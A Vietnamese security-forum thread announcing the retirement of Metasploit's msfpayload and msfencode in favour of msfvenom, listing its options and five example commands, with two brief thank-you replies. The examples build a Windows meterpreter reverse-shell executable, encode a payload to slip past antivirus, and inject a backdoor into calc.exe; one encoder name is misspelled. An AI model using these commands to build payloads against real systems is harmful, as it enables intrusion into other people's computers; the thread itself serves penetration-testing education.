Lời chào tạm biệt tới msfpayload và msfencode

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Lời chào tạm biệt tới msfpayload và msfencode
Ai trong số chúng ta đã và đang sử dụng metasploit làm công cụ để thực hành, học tập, và nghiên cứu bảo mật đã từng nghe qua tới hai công cụ msfpayload msfencode. Nhưng trong những ngày gần đây, đội ngũ phát triển của metasploit đã chính thức công bố sự kết thúc của hai công cụ này, và sẽ không còn hỗ trợ hoặc có bất kỳ một bản vá lỗi nào cho nó nữa. Kể từ ngày 8/6/2015, toàn bộ những thứ liên quan tới msfpayload msfencode sẽ được loại bỏ hoàn toàn ra khỏi metasploit, và nó được thay thế bởi msfvenom. Msfvenom là sự kết hợp của msfpayload msfencode, đã được đội ngũ phát triển thử nghiệm từ 3.5 trước đây.

audit_Pentest.png

msfpayload msfencode đã đi cùng với cộng đồng hacking từ hơn 10 năm nay, và chúng ta đã quá quen thuộc với nó, từ những bài hướng dẫn bằng văn bản, hay bằng video trên youtube, hay tất cả cách sách viết về bảo mật. Nhưng hôm nay, chúng ta sẽ nói lời tạm biệt chúng và bắt đầu làm quen với công cụ với mang tên msfvenom.

Cách sử dụng Msfvenom


-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads

-l, --list [module_type] List a module type example: payloads, encoders, nops, all

-n, --nopsled Prepend a nopsled of [length] size on to the payload

-f, --format Output format (use --help-formats for a list)

-e, --encoder [encoder] The encoder to use

-a, --arch The architecture to use --platform The platform of the payload

-s, --space The maximum size of the resulting payload

-b, --bad-chars The list of characters to avoid example: '\x00\xff'

-i, --iterations The number of times to encode the payload

-c, --add-code Specify an additional win32 shellcode file to include

-x, --template Specify a custom executable file to use as a template

-k, --keep Preserve the template behavior and inject the payload as a new thread

-o, --options List the payload's standard options

-h, --help Show this message --help-formats List available formats

Ví dụ 1: Nếu bạn muốn liệt kê tất cả các payload trong metasploit, bạn chỉ cần nhập lệnh:

./msfvenom -l payloads

Ví dụ 2: Đưa ra một payload windows/metepreter/reverse_tcp:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe

Ví dụ 3: Đưa ra một payload mà có khả năng vượt qua phần mềm diệt virus

./msfvenom -p windows/meterpreter/bind_tcp -b '\x80'

Ví dụ 4: Đưa ra một payload với một công cụ mã hóa và số lần mã hóa:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_ta -i 3

Ví dụ 5: Inject một payload vào calc.exe và lưu chúng và một file mới new.exe:

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe


P/s: Các bạn nên làm quen ngay với công cụ này nhé, để sau khi họ chính thức gỡ bở msfencode và msfpayload thì bạn sẽ không còn bỡ ngỡ nữa.
;)
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Lời chào tạm biệt tới msfpayload và msfencode

đang dùng msfpayload quen, chia tay cũng ngậm ngùi .... :(
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Lời chào tạm biệt tới msfpayload và msfencode

Thanks bạn đã chia sẽ cho tôi những kiến thức hay
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
msfencode msfpayload msfvenom
Bên trên